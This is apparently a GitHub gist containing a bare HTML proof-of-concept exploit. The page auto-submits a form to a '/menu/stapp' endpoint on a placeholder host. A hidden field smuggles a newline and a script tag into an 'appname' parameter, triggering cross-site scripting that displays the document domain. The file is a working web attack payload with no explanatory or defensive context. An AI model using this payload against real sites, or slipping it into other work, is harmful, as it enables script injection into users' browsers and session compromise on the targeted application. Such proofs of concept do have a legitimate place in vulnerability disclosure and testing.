Created
February 16, 2021 10:29
-
-
Save bing0o/439c778956dce73151908758103270f2 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <form name=TheForm action=https://HOSTNAME/menu/stapp method=post> | |
| <input type=hidden name=foo value='appname=%0a"</input><script>alert(document.domain)</script>'> | |
| </form> | |
| <script> | |
| document.TheForm.submit(); | |
| </script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment